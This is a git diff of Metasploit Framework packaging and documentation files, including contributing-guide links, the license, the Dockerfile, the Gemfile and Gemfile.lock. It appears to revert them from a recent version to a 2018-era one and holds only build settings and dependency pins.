+or e-mail us at the [metasploit-hackers] mailing list.

-Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
-curve, so keep it up!
+Also, **thank you** for taking the few moments to read this far! You're
+already way ahead of the curve, so keep it up!

-[Code of Conduct]:https://docs.metasploit.com/docs/code-of-conduct.html
-[Submit bugs and feature requests]:http://r-7.co/MSF-BUGv1
-[Help fellow users with open issues]:https://github.com/rapid7/metasploit-framework/issues
-[help fellow committers test recently submitted pull requests]:https://github.com/rapid7/metasploit-framework/pulls
-[Report a security vulnerability in Metasploit itself]:https://www.rapid7.com/disclosure.jsp
-[development environment]:http://r-7.co/MSF-DEV
-[proof-of-concept exploits]:https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true
+[Issue Tracker]:http://r-7.co/MSF-BUGv1
+[PGP key]:http://pgp.mit.edu:11371/pks/lookup?op=vindex&search=0x2380F85B8AD4DB8D
+[wiki]:https://github.com/rapid7/metasploit-framework/wiki
+[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
+[development environment setup]:http://r-7.co/MSF-DEV
+[Common Coding Mistakes]:https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
 [Ruby style guide]:https://github.com/bbatsov/ruby-style-guide
 [Rubocop]:https://rubygems.org/search?query=rubocop
 [50/72 rule]:http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html
 [topic branch]:http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches
-[draft PR]:https://help.github.com/en/articles/about-pull-requests#draft-pull-requests
-[console output]:https://docs.github.com/en/free-pro-team@latest/github/writing-on-github/creating-and-highlighting-code-blocks#fenced-code-blocks
-[verification steps]:https://docs.github.com/en/free-pro-team@latest/github/writing-on-github/basic-writing-and-formatting-syntax#task-lists
+[console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
+[verification steps]:https://help.github.com/articles/writing-on-github#task-lists
 [reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
-[PR#9966]:https://github.com/rapid7/metasploit-framework/pull/9966
+[release notes]:https://github.com/rapid7/metasploit-framework/wiki/Adding-Release-Notes-to-PRs
+[PR#2940]:https://github.com/rapid7/metasploit-framework/pull/2940
+[PR#3043]:https://github.com/rapid7/metasploit-framework/pull/3043
 [pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
 [API]:https://rapid7.github.io/metasploit-framework/api
-[module documentation]:https://docs.metasploit.com/docs/using-metasploit/basics/module-documentation.html
-[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
 [RSpec]:http://rspec.info
-[Better Specs]:http://www.betterspecs.org/
+[Better Specs]:http://betterspecs.org
 [YARD]:http://yardoc.org
 [Issues]:https://github.com/rapid7/metasploit-framework/issues
-[Metasploit Slack]:https://www.metasploit.com/slack
-[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
+[Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
+[metasploit-hackers]:https://groups.google.com/forum/#!forum/metasploit-hackers
@@ -1,4 +1,4 @@
-Copyright (C) 2006-2026, Rapid7, Inc.
+Copyright (C) 2006-2018, Rapid7, Inc.
 All rights reserved.

 Redistribution and use in source and binary forms, with or without modification,
@@ -1,20 +0,0 @@
-Active Metasploit 5 development will sometimes push aggressive changes.
-Integrations with 3rd-party tools, as well as general usage, may change quickly
-from day to day. Some of the steps for dealing with major changes will be
-documented here. We will continue to maintain the Metasploit 4.x branch until
-Metasploit 5.0 is released.
-
-**2018/01/17 - [internal] module cache reworked to not store metadata in PostgreSQL**
-
-Metasploit no longer stores module metadata in a PostgreSQL database, instead
-storing it in a cache file in your local ~/.msf4 config directory. This has a
-number of advantages:
-
- * Fast searches whether you have the database enabled or not (no more slow search mode)
- * Faster load time for msfconsole, the cache loads more quickly
- * Private module data is not uploaded to a shared database, no collisions
- * Adding or deleting modules no longer displays file-not-found error messages on start in msfconsole
- * Reduced memory consumption
-
-Code that reads directly from the Metasploit database for module data will need
-to use the new module search API.
@@ -1,30 +1,39 @@
-FROM ruby:3.3.8-alpine3.21 AS builder
+FROM ruby:2.4.3-alpine3.7
 LABEL maintainer="Rapid7"

-ARG BUNDLER_CONFIG_ARGS="set force_ruby_platform 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
-ARG BUNDLER_FORCE_CLEAN="true"
-ENV APP_HOME=/usr/src/metasploit-framework
-ENV TOOLS_HOME=/usr/src/tools
+ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
+ENV APP_HOME /usr/src/metasploit-framework/
+ENV NMAP_PRIVILEGED=""
 ENV BUNDLE_IGNORE_MESSAGES="true"
 WORKDIR $APP_HOME

-COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME/
+COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME
 COPY lib/metasploit/framework/version.rb $APP_HOME/lib/metasploit/framework/version.rb
 COPY lib/metasploit/framework/rails_version_constraint.rb $APP_HOME/lib/metasploit/framework/rails_version_constraint.rb
 COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb

-RUN apk add --no-cache \
-      autoconf \
+RUN apk update && \
+    apk add \
      bash \
+      sqlite-libs \
+      nmap \
+      nmap-scripts \
+      nmap-nselibs \
+      postgresql-libs \
+      python \
+      python3 \
+      ncurses \
+      libcap \
+      su-exec \
+    && apk add --virtual .ruby-builddeps \
+      autoconf \
      bison \
      build-base \
-      curl \
      ruby-dev \
-      openssl-dev \
+      libressl-dev \
      readline-dev \
      sqlite-dev \
      postgresql-dev \
-      libffi-dev \
      libpcap-dev \
      libxml2-dev \
      libxslt-dev \
@@ -32,71 +41,23 @@ RUN apk add --no-cache \
      zlib-dev \
      ncurses-dev \
      git \
-      go \
-    && echo "gem: --no-document" > /etc/gemrc \
+    && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
    && gem update --system \
-    && bundle config $BUNDLER_CONFIG_ARGS \
-    && bundle install --jobs=8 \
-    && if [ "${BUNDLER_FORCE_CLEAN}" == "true" ]; then \
-         bundle clean --force; \
-       fi \
-    # temp fix for https://github.com/bundler/bundler/issues/6680
-    && rm -rf /usr/local/bundle/cache \
-    # needed so non root users can read content of the bundle
-    && chmod -R a+r /usr/local/bundle
-
-ENV GO111MODULE=off
-RUN mkdir -p $TOOLS_HOME/bin && \
-    cd $TOOLS_HOME/bin && \
-    curl -O https://dl.google.com/go/go1.24.0.src.tar.gz && \
-    tar -zxf go1.24.0.src.tar.gz && \
-    rm go1.24.0.src.tar.gz && \
-    cd go/src && \
-    ./make.bash
-
-FROM ruby:3.3.8-alpine3.21
-LABEL maintainer="Rapid7"
-ARG TARGETARCH
-
-ENV APP_HOME=/usr/src/metasploit-framework
-ENV TOOLS_HOME=/usr/src/tools
-ENV NMAP_PRIVILEGED=""
-ENV METASPLOIT_GROUP=metasploit
-
-# used for the copy command
-RUN addgroup -S $METASPLOIT_GROUP
-
-RUN apk add --no-cache curl bash sqlite-libs nmap nmap-scripts nmap-nselibs \
-    postgresql-libs python3 py3-pip py3-impacket py3-requests ncurses libcap su-exec alpine-sdk \
-    openssl-dev nasm
-RUN\
-    if [ "${TARGETARCH}" = "arm64" ];\
-	then apk add --no-cache gcc musl-dev python3-dev libffi-dev gcompat;\
-    else apk add --no-cache mingw-w64-gcc;\
-    fi
+    && gem install bundler \
+    && bundle install --system $BUNDLER_ARGS \
+    && apk del .ruby-builddeps \
+    && rm -rf /var/cache/apk/*

 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)

-COPY --from=builder /usr/local/bundle /usr/local/bundle
-RUN chown -R root:metasploit /usr/local/bundle
-COPY . $APP_HOME/
-COPY --from=builder $TOOLS_HOME $TOOLS_HOME
-RUN chown -R root:metasploit $APP_HOME/
-RUN chmod 664 $APP_HOME/Gemfile.lock
-RUN gem update --system
-RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
-
-ENV GOPATH=$TOOLS_HOME/go
-ENV GOROOT=$TOOLS_HOME/bin/go
-ENV PATH=${PATH}:${GOPATH}/bin:${GOROOT}/bin
-
-WORKDIR $APP_HOME
+ADD ./ $APP_HOME

 # we need this entrypoint to dynamically create a user
 # matching the hosts UID and GID so we can mount something
 # from the users home directory. If the IDs don't match
-# it results in access denied errors.
+# it results in access denied errors. Once docker has
+# a solution for this we can revert it back to normal
 ENTRYPOINT ["docker/entrypoint.sh"]

-CMD ["./msfconsole", "-r", "docker/msfconsole.rc", "-y", "$APP_HOME/config/database.yml"]
+CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]
@@ -6,7 +6,7 @@ gemspec name: 'metasploit-framework'
 # separate from test as simplecov is not run on travis-ci
 group :coverage do
  # code coverage for tests
-  gem 'simplecov', '0.18.2'
+  gem 'simplecov'
 end

 group :development do
@@ -15,44 +15,38 @@ group :development do
  # generating documentation
  gem 'yard'
  # for development and testing purposes
-  gem 'pry-byebug'
-  # Ruby Debugging Library - rebuilt and included by default from Ruby 3.1 onwards.
-  # Replaces the old lib/debug.rb and provides more features.
-  gem 'debug', '>= 1.0.0'
+  gem 'pry'
  # module documentation
  gem 'octokit'
-  # memory profiling
-  gem 'memory_profiler'
-  # cpu profiling
-  gem 'ruby-prof'
  # Metasploit::Aggregator external session proxy
-  # disabled during 2.5 transition until aggregator is available
-  # gem 'metasploit-aggregator'
+  gem 'metasploit-aggregator' if [
+    'x86-mingw32', 'x64-mingw32',
+    'x86_64-linux', 'x86-linux',
+    'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
+  gem 'google-protobuf', '3.5.1' if [
+    'x86-mingw32', 'x64-mingw32',
+    'x86_64-linux', 'x86-linux',
+    'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
+  gem 'grpc', '1.8.3'  if [
+    'x86-mingw32', 'x64-mingw32',
+    'x86_64-linux', 'x86-linux',
+    'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
 end

 group :development, :test do
-  # For ./tools/dev/update_gem_licenses.sh
-  gem 'license_finder', '5.11.1'
+  # automatically include factories from spec/factories
+  gem 'factory_girl_rails'
+  # Make rspec output shorter and more useful
+  gem 'fivemat'
  # running documentation generation tasks and rspec tasks
  gem 'rake'
  # Define `rake spec`.  Must be in development AND test so that its available by default as a rake test when the
  # environment is development
  gem 'rspec-rails'
  gem 'rspec-rerun'
-  # Required during CI as well local development
-  gem 'rubocop', '1.75.7'
 end

 group :test do
-  # automatically include factories from spec/factories
-  gem 'test-prof'
-  gem 'factory_bot_rails'
-  # Make rspec output shorter and more useful
-  gem 'fivemat'
-  # rspec formatter for acceptance tests
-  gem 'allure-rspec'
  # Manipulate Time.now in specs
  gem 'timecop'
-  # stub and set expectations on HTTP requests
-  gem 'webmock', '~> 3.18'
 end
@@ -27,9 +27,6 @@ end

 # Create a custom group
 group :local do
-  # This is the first way to add a non-standard gem file dependency in.
+  # Add the lab gem so that the 'lab' plugin will work again
  gem 'lab', '~> 0.2.7'
-  # And this is another way that references local directories to find and compile the gem file as needed.
-  # This is the optimal method for testing Gem PRs such as those in rex-text or rex-powershell.
-  gem 'rex-powershell', path: '../rex-powershell'
 end
@@ -1,63 +1,29 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.4.133)
-      aarch64
-      abbrev
-      actionpack (~> 7.2.0)
-      activerecord (~> 7.2.0)
-      activesupport (~> 7.2.0)
-      aws-sdk-ec2
-      aws-sdk-ec2instanceconnect
-      aws-sdk-iam
-      aws-sdk-s3
-      aws-sdk-ssm
-      base64
+    metasploit-framework (4.16.45)
+      actionpack (~> 4.2.6)
+      activerecord (~> 4.2.6)
+      activesupport (~> 4.2.6)
+      backports
      bcrypt
      bcrypt_pbkdf
-      benchmark
-      bigdecimal
-      bootsnap
-      bson
-      chunky_png
-      csv
-      date (= 3.4.1)
+      bit-struct
      dnsruby
-      drb
-      ed25519
-      elftools
-      em-http-request
-      eventmachine
      faker
-      faraday
-      faraday-retry
-      faye-websocket
-      ffi (< 1.17.0)
-      fiddle
      filesize
-      getoptlong
-      hrr_rb_ssh-ed25519
-      http-cookie
-      irb
      jsobfu
      json
-      lru_redux
-      mcp (= 0.13.0)
      metasm
      metasploit-concern
-      metasploit-credential (>= 6.0.21)
+      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.245)
-      metasploit_data_models (>= 6.0.15)
-      metasploit_payloads-mettle (= 1.0.46)
+      metasploit-payloads (= 1.3.31)
+      metasploit_data_models
+      metasploit_payloads-mettle (= 0.3.7)
      mqtt
-      msgpack (~> 1.6.0)
-      mutex_m
+      msgpack
      nessus_rest
-      net-imap
-      net-ldap
-      net-sftp
-      net-smtp
      net-ssh
      network_interface
      nexpose
@@ -65,22 +31,15 @@ PATH
      octokit
      openssl-ccm
      openvas-omp
-      ostruct
      packetfu
-      parallel
      patch_finder
      pcaprub
      pdf-reader
-      pg
-      puma
-      rack (~> 2.2)
+      pg (= 0.20.0)
      railties
-      rasn1 (= 0.14.0)
      rb-readline
      recog
      redcarpet
-      reline
-      rest-client
      rex-arch
      rex-bin_tools
      rex-core
@@ -90,7 +49,7 @@ PATH
      rex-mime
      rex-nop
      rex-ole
-      rex-powershell
+      rex-powershell (< 0.1.78)
      rex-random_identifier
      rex-registry
      rex-rop_builder
@@ -99,622 +58,326 @@ PATH
      rex-struct2
      rex-text
      rex-zip
-      rexml (= 3.4.1)
-      rinda
      ruby-macho
-      ruby-mysql
-      ruby_smb (~> 3.3.17)
+      ruby_smb (= 0.0.18)
      rubyntlm
      rubyzip
-      sinatra (~> 3.2)
-      sqlite3 (= 1.7.3)
+      sqlite3
      sshkey
-      stringio (= 3.1.1)
-      swagger-blocks
-      syslog
-      thin (~> 1.x)
      tzinfo
      tzinfo-data
-      unix-crypt
-      warden
-      win32api
      windows_error
-      winrm
      xdr
      xmlrpc
-      zeitwerk

 GEM
  remote: https://rubygems.org/
  specs:
-    Ascii85 (2.0.1)
-    aarch64 (2.1.0)
-      racc (~> 1.6)
-    abbrev (0.1.2)
-    actionpack (7.2.2.2)
-      actionview (= 7.2.2.2)
-      activesupport (= 7.2.2.2)
-      nokogiri (>= 1.8.5)
-      racc
-      rack (>= 2.2.4, < 3.2)
-      rack-session (>= 1.0.1)
-      rack-test (>= 0.6.3)
-      rails-dom-testing (~> 2.2)
-      rails-html-sanitizer (~> 1.6)
-      useragent (~> 0.16)
-    actionview (7.2.2.2)
-      activesupport (= 7.2.2.2)
+    Ascii85 (1.0.3)
+    actionpack (4.2.10)
+      actionview (= 4.2.10)
+      activesupport (= 4.2.10)
+      rack (~> 1.6)
+      rack-test (~> 0.6.2)
+      rails-dom-testing (~> 1.0, >= 1.0.5)
+      rails-html-sanitizer (~> 1.0, >= 1.0.2)
+    actionview (4.2.10)
+      activesupport (= 4.2.10)
      builder (~> 3.1)
-      erubi (~> 1.11)
-      rails-dom-testing (~> 2.2)
-      rails-html-sanitizer (~> 1.6)
-    activemodel (7.2.2.2)
-      activesupport (= 7.2.2.2)
-    activerecord (7.2.2.2)
-      activemodel (= 7.2.2.2)
-      activesupport (= 7.2.2.2)
-      timeout (>= 0.4.0)
-    activesupport (7.2.2.2)
-      base64
-      benchmark (>= 0.3)
-      bigdecimal
-      concurrent-ruby (~> 1.0, >= 1.3.1)
-      connection_pool (>= 2.2.5)
-      drb
-      i18n (>= 1.6, < 2)
-      logger (>= 1.4.2)
-      minitest (>= 5.1)
-      securerandom (>= 0.3)
-      tzinfo (~> 2.0, >= 2.0.5)
-    addressable (2.8.7)
-      public_suffix (>= 2.0.2, < 7.0)
+      erubis (~> 2.7.0)
+      rails-dom-testing (~> 1.0, >= 1.0.5)
+      rails-html-sanitizer (~> 1.0, >= 1.0.3)
+    activemodel (4.2.10)
+      activesupport (= 4.2.10)
+      builder (~> 3.1)
+    activerecord (4.2.10)
+      activemodel (= 4.2.10)
+      activesupport (= 4.2.10)
+      arel (~> 6.0)
+    activesupport (4.2.10)
+      i18n (~> 0.7)
+      minitest (~> 5.1)
+      thread_safe (~> 0.3, >= 0.3.4)
+      tzinfo (~> 1.1)
+    addressable (2.5.2)
+      public_suffix (>= 2.0.2, < 4.0)
    afm (0.2.2)
-    allure-rspec (2.27.0)
-      allure-ruby-commons (= 2.27.0)
-      rspec-core (>= 3.8, < 4)
-    allure-ruby-commons (2.27.0)
-      mime-types (>= 3.3, < 4)
-      require_all (>= 2, < 4)
-      rspec-expectations (~> 3.12)
-    arel-helpers (2.16.0)
-      activerecord (>= 3.1.0, < 8.1)
-    ast (2.4.3)
-    aws-eventstream (1.3.2)
-    aws-partitions (1.1065.0)
-    aws-sdk-core (3.220.1)
-      aws-eventstream (~> 1, >= 1.3.0)
-      aws-partitions (~> 1, >= 1.992.0)
-      aws-sigv4 (~> 1.9)
-      base64
-      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.511.0)
-      aws-sdk-core (~> 3, >= 3.216.0)
-      aws-sigv4 (~> 1.5)
-    aws-sdk-ec2instanceconnect (1.55.0)
-      aws-sdk-core (~> 3, >= 3.216.0)
-      aws-sigv4 (~> 1.5)
-    aws-sdk-iam (1.119.0)
-      aws-sdk-core (~> 3, >= 3.216.0)
-      aws-sigv4 (~> 1.5)
-    aws-sdk-kms (1.99.0)
-      aws-sdk-core (~> 3, >= 3.216.0)
-      aws-sigv4 (~> 1.5)
-    aws-sdk-s3 (1.182.0)
-      aws-sdk-core (~> 3, >= 3.216.0)
-      aws-sdk-kms (~> 1)
-      aws-sigv4 (~> 1.5)
-    aws-sdk-ssm (1.191.0)
-      aws-sdk-core (~> 3, >= 3.216.0)
-      aws-sigv4 (~> 1.5)
-    aws-sigv4 (1.11.0)
-      aws-eventstream (~> 1, >= 1.0.2)
-    base64 (0.3.0)
-    bcrypt (3.1.20)
-    bcrypt_pbkdf (1.1.1)
-    benchmark (0.4.1)
-    bigdecimal (3.3.1)
-    bindata (2.4.15)
-    bootsnap (1.18.4)
-      msgpack (~> 1.2)
-    bson (5.1.1)
-    builder (3.3.0)
-    byebug (12.0.0)
-    chunky_png (1.4.0)
-    coderay (1.1.3)
-    concurrent-ruby (1.3.5)
-    connection_pool (2.5.4)
-    cookiejar (0.3.4)
-    crack (1.0.1)
-      bigdecimal
-      rexml
-    crass (1.0.6)
-    csv (3.3.2)
-    daemons (1.4.1)
-    date (3.4.1)
-    debug (1.11.0)
-      irb (~> 1.10)
-      reline (>= 0.3.8)
-    diff-lcs (1.6.2)
-    dnsruby (1.73.1)
-      base64 (>= 0.2)
-      logger (~> 1.6)
-      simpleidn (~> 0.2.1)
-    docile (1.4.1)
-    domain_name (0.6.20240107)
-    drb (2.2.3)
-    ed25519 (1.4.0)
-    elftools (1.3.1)
-      bindata (~> 2)
-    em-http-request (1.1.7)
-      addressable (>= 2.3.4)
-      cookiejar (!= 0.3.1)
-      em-socksify (>= 0.3)
-      eventmachine (>= 1.0.3)
-      http_parser.rb (>= 0.6.0)
-    em-socksify (0.3.3)
-      base64
-      eventmachine (>= 1.0.0.beta.4)
-    erb (5.0.3)
-    erubi (1.13.1)
-    eventmachine (1.2.7)
-    factory_bot (6.5.5)
-      activesupport (>= 6.1.0)
-    factory_bot_rails (6.5.1)
-      factory_bot (~> 6.5)
-      railties (>= 6.1.0)
-    faker (3.5.1)
-      i18n (>= 1.8.11, < 2)
-    faraday (2.7.11)
-      base64
-      faraday-net_http (>= 2.0, < 3.1)
-      ruby2_keywords (>= 0.0.4)
-    faraday-net_http (3.0.2)
-    faraday-retry (2.2.1)
-      faraday (~> 2.0)
-    faye-websocket (0.11.3)
-      eventmachine (>= 0.12.0)
-      websocket-driver (>= 0.5.1)
-    ffi (1.16.3)
-    fiddle (1.1.6)
-    filesize (0.2.0)
-    fivemat (1.3.7)
-    forwardable (1.3.3)
-    getoptlong (0.2.1)
-    gssapi (1.3.1)
-      ffi (>= 1.0.1)
-    gyoku (1.4.0)
-      builder (>= 2.1.2)
-      rexml (~> 3.0)
-    hashdiff (1.2.1)
+    arel (6.0.4)
+    arel-helpers (2.6.1)
+      activerecord (>= 3.1.0, < 6)
+    backports (3.11.1)
+    bcrypt (3.1.11)
+    bcrypt_pbkdf (1.0.0)
+    bindata (2.4.2)
+    bit-struct (0.16)
+    builder (3.2.3)
+    coderay (1.1.2)
+    concurrent-ruby (1.0.5)
+    crass (1.0.3)
+    diff-lcs (1.3)
+    dnsruby (1.60.2)
+    docile (1.1.5)
+    erubis (2.7.0)
+    factory_girl (4.9.0)
+      activesupport (>= 3.0.0)
+    factory_girl_rails (4.9.0)
+      factory_girl (~> 4.9.0)
+      railties (>= 3.0.0)
+    faker (1.8.7)
+      i18n (>= 0.7)
+    faraday (0.14.0)
+      multipart-post (>= 1.2, < 3)
+    filesize (0.1.1)
+    fivemat (1.3.6)
+    google-protobuf (3.5.1)
+    googleapis-common-protos-types (1.0.1)
+      google-protobuf (~> 3.0)
+    googleauth (0.6.2)
+      faraday (~> 0.12)
+      jwt (>= 1.4, < 3.0)
+      logging (~> 2.0)
+      memoist (~> 0.12)
+      multi_json (~> 1.11)
+      os (~> 0.9)
+      signet (~> 0.7)
+    grpc (1.8.3)
+      google-protobuf (~> 3.1)
+      googleapis-common-protos-types (~> 1.0.0)
+      googleauth (>= 0.5.1, < 0.7)
    hashery (2.1.2)
-    hrr_rb_ssh (0.4.2)
-    hrr_rb_ssh-ed25519 (0.4.2)
-      ed25519 (~> 1.2)
-      hrr_rb_ssh (>= 0.4)
-    http-accept (1.7.0)
-    http-cookie (1.0.8)
-      domain_name (~> 0.5)
-    http_parser.rb (0.8.0)
-    httpclient (2.9.0)
-      mutex_m
-    i18n (1.14.7)
+    i18n (0.9.5)
      concurrent-ruby (~> 1.0)
-    io-console (0.8.1)
-    ipaddr (1.2.7)
-    irb (1.15.2)
-      pp (>= 0.6.0)
-      rdoc (>= 4.0.0)
-      reline (>= 0.4.2)
-    jmespath (1.6.2)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.15.1)
-    json-schema (6.2.0)
-      addressable (~> 2.8)
-      bigdecimal (>= 3.1, < 5)
-    language_server-protocol (3.17.0.5)
-    license_finder (5.11.1)
-      bundler
-      rubyzip (>= 1, < 3)
-      thor
-      toml (= 0.2.0)
-      with_env (= 1.1.0)
-      xml-simple
-    lint_roller (1.1.0)
+    json (2.1.0)
+    jwt (2.1.0)
    little-plugger (1.1.4)
-    logger (1.7.0)
-    logging (2.4.0)
+    logging (2.2.2)
      little-plugger (~> 1.1)
-      multi_json (~> 1.14)
-    loofah (2.24.1)
+      multi_json (~> 1.10)
+    loofah (2.2.0)
      crass (~> 1.0.2)
-      nokogiri (>= 1.12.0)
-    lru_redux (1.1.0)
-    mcp (0.13.0)
-      json-schema (>= 4.1)
-    memory_profiler (1.1.0)
-    metasm (1.0.5)
-    metasploit-concern (5.0.5)
-      activemodel (~> 7.0)
-      activesupport (~> 7.0)
-      drb
-      mutex_m
-      railties (~> 7.0)
-      zeitwerk
-    metasploit-credential (6.0.23)
-      bigdecimal
-      csv
-      drb
+      nokogiri (>= 1.5.9)
+    memoist (0.16.0)
+    metasm (1.0.3)
+    metasploit-aggregator (1.0.0)
+      grpc
+      rex-arch
+    metasploit-concern (2.0.5)
+      activemodel (~> 4.2.6)
+      activesupport (~> 4.2.6)
+      railties (~> 4.2.6)
+    metasploit-credential (2.0.13)
      metasploit-concern
      metasploit-model
-      metasploit_data_models (>= 5.0.0)
-      mutex_m
-      net-ssh
+      metasploit_data_models
      pg
      railties
      rex-socket
      rubyntlm
-      rubyzip (< 3.0.0)
-    metasploit-model (5.0.4)
-      activemodel (~> 7.0)
-      activesupport (~> 7.0)
-      bigdecimal
-      drb
-      mutex_m
-      railties (~> 7.0)
-    metasploit-payloads (2.0.245)
-    metasploit_data_models (6.0.18)
-      activerecord (>= 7.0, < 8.1)
-      activesupport (>= 7.0, < 8.1)
+      rubyzip
+    metasploit-model (2.0.4)
+      activemodel (~> 4.2.6)
+      activesupport (~> 4.2.6)
+      railties (~> 4.2.6)
+    metasploit-payloads (1.3.31)
+    metasploit_data_models (2.0.16)
+      activerecord (~> 4.2.6)
+      activesupport (~> 4.2.6)
      arel-helpers
-      bigdecimal
-      drb
      metasploit-concern
-      metasploit-model (>= 5.0.4)
-      mutex_m
-      pg
-      railties (>= 7.0, < 8.1)
-      recog
-      webrick
-    metasploit_payloads-mettle (1.0.46)
-    method_source (1.1.0)
-    mime-types (3.7.0)
-      logger
-      mime-types-data (~> 3.2025, >= 3.2025.0507)
-    mime-types-data (3.2025.0924)
-    mini_portile2 (2.8.9)
-    minitest (5.25.5)
-    mqtt (0.7.0)
-      logger
-    msgpack (1.6.1)
-    multi_json (1.15.0)
-    mustermann (3.0.3)
-      ruby2_keywords (~> 0.0.1)
-    mutex_m (0.3.0)
+      metasploit-model
+      pg (= 0.20.0)
+      postgres_ext
+      railties (~> 4.2.6)
+      recog (~> 2.0)
+    metasploit_payloads-mettle (0.3.7)
+    method_source (0.9.0)
+    mini_portile2 (2.3.0)
+    minitest (5.11.3)
+    mqtt (0.5.0)
+    msgpack (1.2.4)
+    multi_json (1.13.1)
+    multipart-post (2.0.0)
    nessus_rest (0.1.6)
-    net-imap (0.5.6)
-      date
-      net-protocol
-    net-ldap (0.19.0)
-    net-protocol (0.2.2)
-      timeout
-    net-sftp (4.0.0)
-      net-ssh (>= 5.0.0, < 8.0.0)
-    net-smtp (0.5.1)
-      net-protocol
-    net-ssh (7.3.0)
-    netrc (0.11.0)
-    network_interface (0.0.4)
-    nexpose (7.3.0)
-    nio4r (2.7.4)
-    nokogiri (1.18.10)
-      mini_portile2 (~> 2.8.2)
-      racc (~> 1.4)
-    nori (2.7.1)
-      bigdecimal
-    octokit (10.0.0)
-      faraday (>= 1, < 3)
-      sawyer (~> 0.9)
-    openssl-ccm (1.2.3)
-    openssl-cmac (2.0.2)
+    net-ssh (4.2.0)
+    network_interface (0.0.2)
+    nexpose (7.2.0)
+    nokogiri (1.8.2)
+      mini_portile2 (~> 2.3.0)
+    octokit (4.8.0)
+      sawyer (~> 0.8.0, >= 0.5.3)
+    openssl-ccm (1.2.1)
    openvas-omp (0.0.4)
-    ostruct (0.6.1)
-    packetfu (2.0.0)
-      pcaprub (~> 0.13.1)
-    parallel (1.27.0)
-    parser (3.3.9.0)
-      ast (~> 2.4.1)
-      racc
-    parslet (1.8.2)
+    os (0.9.6)
+    packetfu (1.1.13)
+      pcaprub
    patch_finder (1.0.2)
-    pcaprub (0.13.3)
-    pdf-reader (2.14.1)
-      Ascii85 (>= 1.0, < 3.0, != 2.0.0)
+    pcaprub (0.12.4)
+    pdf-reader (2.1.0)
+      Ascii85 (~> 1.0.0)
      afm (~> 0.2.1)
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (1.5.9)
-    pp (0.6.3)
-      prettyprint
-    prettyprint (0.2.0)
-    prism (1.5.1)
-    pry (0.15.2)
-      coderay (~> 1.1)
-      method_source (~> 1.0)
-    pry-byebug (3.11.0)
-      byebug (~> 12.0)
-      pry (>= 0.13, < 0.16)
-    psych (5.2.6)
-      date
-      stringio
-    public_suffix (6.0.2)
-    puma (6.6.0)
-      nio4r (~> 2.0)
-    racc (1.8.1)
-    rack (2.2.19)
-    rack-protection (3.2.0)
-      base64 (>= 0.1.0)
-      rack (~> 2.2, >= 2.2.4)
-    rack-session (1.0.2)
-      rack (< 3)
-    rack-test (2.2.0)
-      rack (>= 1.3)
-    rackup (1.0.1)
-      rack (< 3)
-      webrick
-    rails-dom-testing (2.3.0)
-      activesupport (>= 5.0.0)
-      minitest
-      nokogiri (>= 1.6)
-    rails-html-sanitizer (1.6.2)
-      loofah (~> 2.21)
-      nokogiri (>= 1.15.7, != 1.16.7, != 1.16.6, != 1.16.5, != 1.16.4, != 1.16.3, != 1.16.2, != 1.16.1, != 1.16.0.rc1, != 1.16.0)
-    railties (7.2.2.2)
-      actionpack (= 7.2.2.2)
-      activesupport (= 7.2.2.2)
-      irb (~> 1.13)
-      rackup (>= 1.0.0)
-      rake (>= 12.2)
-      thor (~> 1.0, >= 1.2.2)
-      zeitwerk (~> 2.6)
-    rainbow (3.1.1)
-    rake (13.3.0)
-    rasn1 (0.14.0)
-      strptime (~> 0.2.5)
+    pg (0.20.0)
+    pg_array_parser (0.0.9)
+    postgres_ext (3.0.0)
+      activerecord (>= 4.0.0)
+      arel (>= 4.0.1)
+      pg_array_parser (~> 0.0.9)
+    pry (0.11.3)
+      coderay (~> 1.1.0)
+      method_source (~> 0.9.0)
+    public_suffix (3.0.2)
+    rack (1.6.9)
+    rack-test (0.6.3)
+      rack (>= 1.0)
+    rails-deprecated_sanitizer (1.0.3)
+      activesupport (>= 4.2.0.alpha)
+    rails-dom-testing (1.0.9)
+      activesupport (>= 4.2.0, < 5.0)
+      nokogiri (~> 1.6)
+      rails-deprecated_sanitizer (>= 1.0.1)
+    rails-html-sanitizer (1.0.3)
+      loofah (~> 2.0)
+    railties (4.2.10)
+      actionpack (= 4.2.10)
+      activesupport (= 4.2.10)
+      rake (>= 0.8.7)
+      thor (>= 0.18.1, < 2.0)
+    rake (12.3.0)
    rb-readline (0.5.5)
-    rdoc (6.15.0)
-      erb
-      psych (>= 4.0.0)
-      tsort
-    recog (3.1.14)
+    recog (2.1.18)
      nokogiri
-    redcarpet (3.6.1)
-    regexp_parser (2.11.3)
-    reline (0.6.2)
-      io-console (~> 0.5)
-    require_all (3.0.0)
-    rest-client (2.1.0)
